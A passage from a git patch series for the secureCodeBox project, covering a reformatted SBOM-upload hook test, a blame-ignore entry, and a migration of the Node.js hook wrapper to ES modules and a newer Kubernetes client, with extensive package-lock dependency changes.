expect(fetch).toBeCalledTimes(1); - expect(fetch).toBeCalledWith(url, expect.objectContaining({ - method: "POST", - headers: { - "X-API-Key": apiKey, - }, - })); - - expect(fetch.mock.calls[0][1].body.get("projectName")).toBe(name); - expect(fetch.mock.calls[0][1].body.get("projectVersion")).toBe(version); -}); +])( + "should detect image reference components accurately", + async ({ reference, name, version }) => { + const result = { + bomFormat: "CycloneDX", + metadata: { + component: { + name: reference, + }, + }, + }; + + const getRawResults = async () => result; + + const scan = { + metadata: { + uid: "a30122a6-7f1a-4e37-ae81-2c25ed7fb8f5", + name: "demo-sbom", + }, + status: { + rawResultType: "sbom-cyclonedx", + }, + }; + + const apiKey = "verysecretgitleaksplsignore"; + const baseUrl = "http://example.com/foo/bar"; + const url = baseUrl + "/api/v1/bom"; + + await handle({ getRawResults, scan, apiKey, baseUrl, fetch }); + + expect(fetch).toBeCalledTimes(1); + expect(fetch).toBeCalledWith( + url, + expect.objectContaining({ + method: "POST", + headers: { + "X-API-Key": apiKey, + }, + }), + ); + + expect(fetch.mock.calls[0][1].body.get("projectName")).toBe(name); + expect(fetch.mock.calls[0][1].body.get("projectVersion")).toBe(version); + }, +); From 31e789134f1b73afcca07e3ea49def4f20af24e1 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 18:33:21 +0200 Subject: [PATCH 085/137] Add prettier reformat to diff ignore list --- .git-blame-ignore-revs | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.git-blame-ignore-revs b/.git-blame-ignore-revs index e17fb623ad..a9de4d7ac9 100644 --- a/.git-blame-ignore-revs +++ b/.git-blame-ignore-revs @@ -16,3 +16,5 @@ 3f033b5c73a087f474f1f22c5091dc5b096bfadd # prettier reformatting of most scanner / parser files 5f61e5c9f128e405c5335ab08cd4cd4ad43675d9 +# prettier reformatting of most hook files +a5675d62fbb732a10cc36276a4bc8eda96e47c33 From a016566cdb2e2859932f8efee9d339acb7bc9332 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 7 Jul 2025 19:11:48 +0200 Subject: [PATCH 086/137] Migrate cascading hook to task and esm --- hook-sdk/nodejs/hook-wrapper.js | 65 +- hook-sdk/nodejs/package-lock.json | 2276 ++-- hook-sdk/nodejs/package.json | 9 +- hooks/cascading-scans/hook/.dockerignore | 1 + hooks/cascading-scans/hook/Dockerfile | 2 +- hooks/cascading-scans/hook/hook.ts | 2 +- hooks/cascading-scans/hook/package-lock.json | 9158 ++++------------- hooks/cascading-scans/hook/package.json | 19 +- hooks/cascading-scans/hook/scan-helpers.ts | 101 +- hooks/cascading-scans/hook/scope-limiter.ts | 2 +- hooks/cascading-scans/hook/tsconfig.json | 16 + .../hook/tsconfig.json.license | 3 + 12 files changed, 2623 insertions(+), 9031 deletions(-) create mode 100644 hooks/cascading-scans/hook/tsconfig.json create mode 100644 hooks/cascading-scans/hook/tsconfig.json.license diff --git a/hook-sdk/nodejs/hook-wrapper.js b/hook-sdk/nodejs/hook-wrapper.js index 4d71cf81c4..a7eddc22f0 100644 --- a/hook-sdk/nodejs/hook-wrapper.js +++ b/hook-sdk/nodejs/hook-wrapper.js @@ -2,17 +2,23 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle } = require("./hook/hook"); -const k8s = require("@kubernetes/client-node"); +import { + KubeConfig, + CustomObjectsApi, + PatchStrategy, +} from "@kubernetes/client-node"; + +import { handle } from "./hook/hook.js"; const scanName = process.env["SCAN_NAME"]; const namespace = process.env["NAMESPACE"]; + console.log(`Starting hook for Scan "${scanName}"`); -const kc = new k8s.KubeConfig(); +const kc = new KubeConfig(); kc.loadFromCluster(); -const k8sApi = kc.makeApiClient(k8s.CustomObjectsApi); +const k8sApi = kc.makeApiClient(CustomObjectsApi); function downloadFile(url) { return fetch(url); @@ -38,6 +44,7 @@ async function uploadFile(url, fileContents) { const response = await fetch(url, { method: "PUT", headers: { "content-type": "" }, + body: fileContents, }); if (!response.ok) { @@ -109,29 +116,28 @@ async function updateFindings(findings) { } await k8sApi.patchNamespacedCustomObjectStatus( - "execution.securecodebox.io", - "v1", - namespace, - "scans", - scanName, { - status: { - findings: { - count: findings.length, - severities: { - informational: severityCount(findings, "INFORMATIONAL"), - low: severityCount(findings, "LOW"), - medium: severityCount(findings, "MEDIUM"), - high: severityCount(findings, "HIGH"), + group: "execution.securecodebox.io", + version: "v1", + namespace, + plural: "scans", + name: scanName, + body: { + status: { + findings: { + count: findings.length, + severities: { + informational: severityCount(findings, "INFORMATIONAL"), + low: severityCount(findings, "LOW"), + medium: severityCount(findings, "MEDIUM"), + high: severityCount(findings, "HIGH"), + }, + categories: Object.fromEntries(findingCategories.entries()), }, - categories: Object.fromEntries(findingCategories.entries()), }, }, }, - undefined, - undefined, - undefined, - { headers: { "content-type": "application/merge-patch+json" } }, + setHeaderOptions("Content-Type", PatchStrategy.MergePatch), ); console.log("Updated status successfully"); } @@ -139,14 +145,13 @@ async function updateFindings(findings) { async function main() { let scan; try { - const { body } = await k8sApi.getNamespacedCustomObject( - "execution.securecodebox.io", - "v1", - namespace, - "scans", - scanName, - ); - scan = body; + scan = await k8sApi.getNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + namespace: namespace, + plural: "scans", + name: scanName, + }); } catch (err) { console.error("Failed to get Scan from the kubernetes api"); console.error(err); diff --git a/hook-sdk/nodejs/package-lock.json b/hook-sdk/nodejs/package-lock.json index 1ebda66e4b..eafac987e2 100644 --- a/hook-sdk/nodejs/package-lock.json +++ b/hook-sdk/nodejs/package-lock.json @@ -9,42 +9,14 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", - "axios": "^1.7.9", - "ws": "^8.13.0" - } - }, - "node_modules/@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "dependencies": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "dependencies": { - "minipass": "^7.0.4" - }, - "engines": { - "node": ">=18.0.0" + "@kubernetes/client-node": "^1.3.0" } }, "node_modules/@jsep-plugin/assignment": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", + "license": "MIT", "engines": { "node": ">= 10.16.0" }, @@ -56,6 +28,7 @@ "version": "1.0.4", "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", + "license": "MIT", "engines": { "node": ">= 10.16.0" }, @@ -64,69 +37,70 @@ } }, "node_modules/@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", + "license": "Apache-2.0", "dependencies": { - "byline": "^5.0.0", + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", "isomorphic-ws": "^5.0.0", "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "request": "^2.88.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "optionalDependencies": { - "openid-client": "^6.1.3" + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "node_modules/@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true, - "engines": { - "node": ">=14" + "node_modules/@types/js-yaml": { + "version": "4.0.9", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", + "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==", + "license": "MIT" + }, + "node_modules/@types/node": { + "version": "22.16.0", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.0.tgz", + "integrity": "sha512-B2egV9wALML1JCpv3VQoQ+yesQKAmNMBIAY7OteVrikcOcAkWm+dGL6qpeCktPjAv6N1JLnhbNiqS35UpFyBsQ==", + "license": "MIT", + "dependencies": { + "undici-types": "~6.21.0" } }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "node_modules/@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", + "license": "MIT", "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" + "@types/node": "*", + "form-data": "^4.0.0" } }, - "node_modules/ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-regex?sponsor=1" + "node_modules/@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", + "license": "MIT", + "dependencies": { + "@types/node": "*" } }, - "node_modules/ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", + "node_modules/agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", + "license": "MIT", "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" + "node": ">= 14" } }, "node_modules/argparse": { @@ -134,121 +108,102 @@ "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" }, - "node_modules/asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "engines": { - "node": ">=0.8" - } - }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", - "engines": { - "node": "*" - } + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", + "license": "Apache-2.0" }, - "node_modules/aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, - "node_modules/axios": { - "version": "1.7.9", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.7.9.tgz", - "integrity": "sha512-LhLcE7Hbiryz8oMDdDptSrWowmB4Bl6RCt6sIJKpRB4XtVf0iEgewX3au/pJqm+Py1kCASkb/FFKjxQaLtxJvw==", - "dependencies": { - "follow-redirects": "^1.15.6", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - } + "node_modules/bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "license": "Apache-2.0", + "optional": true }, - "node_modules/axios/node_modules/form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", + "node_modules/bare-fs": { + "version": "4.1.6", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.6.tgz", + "integrity": "sha512-25RsLF33BqooOEFNdMcEhMpJy8EoR88zSMrnOQOaM3USnOK2VmaJ1uaQEwPA6AQjrv1lXChScosN6CzbwbO9OQ==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" }, "engines": { - "node": ">= 6" + "bare": ">=1.16.0" + }, + "peerDependencies": { + "bare-buffer": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + } } }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dependencies": { - "tweetnacl": "^0.14.3" + "node_modules/bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "license": "Apache-2.0", + "optional": true, + "engines": { + "bare": ">=1.14.0" } }, - "node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "node_modules/bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", - "engines": { - "node": ">=0.10.0" + "bare-os": "^3.0.1" } }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "node_modules/chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "engines": { - "node": ">=18" + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "streamx": "^2.21.0" + }, + "peerDependencies": { + "bare-buffer": "*", + "bare-events": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } } }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "license": "MIT", "dependencies": { - "color-name": "~1.1.4" + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" }, "engines": { - "node": ">=7.0.0" + "node": ">= 0.4" } }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", @@ -260,33 +215,21 @@ "node": ">= 0.8" } }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "node_modules/debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", + "license": "MIT", "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" + "ms": "^2.1.3" }, "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "dependencies": { - "assert-plus": "^1.0.0" + "node": ">=6.0" }, - "engines": { - "node": ">=0.10" + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } } }, "node_modules/delayed-stream": { @@ -297,169 +240,214 @@ "node": ">=0.4.0" } }, - "node_modules/eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "license": "MIT", "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + }, + "engines": { + "node": ">= 0.4" } }, - "node_modules/emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" + "node_modules/end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "license": "MIT", + "dependencies": { + "once": "^1.4.0" + } }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } }, - "node_modules/extsprintf": { + "node_modules/es-errors": { "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "engines": [ - "node >=0.6.0" - ] + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + } }, - "node_modules/fast-json-stable-stringify": { + "node_modules/es-set-tostringtag": { "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "node_modules/follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/RubenVerborgh" - } - ], - "engines": { - "node": ">=4.0" + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" }, - "peerDependenciesMeta": { - "debug": { - "optional": true - } + "engines": { + "node": ">= 0.4" } }, - "node_modules/foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", + "license": "MIT" + }, + "node_modules/form-data": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", + "license": "MIT", "dependencies": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" }, "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" + "node": ">= 6" } }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - 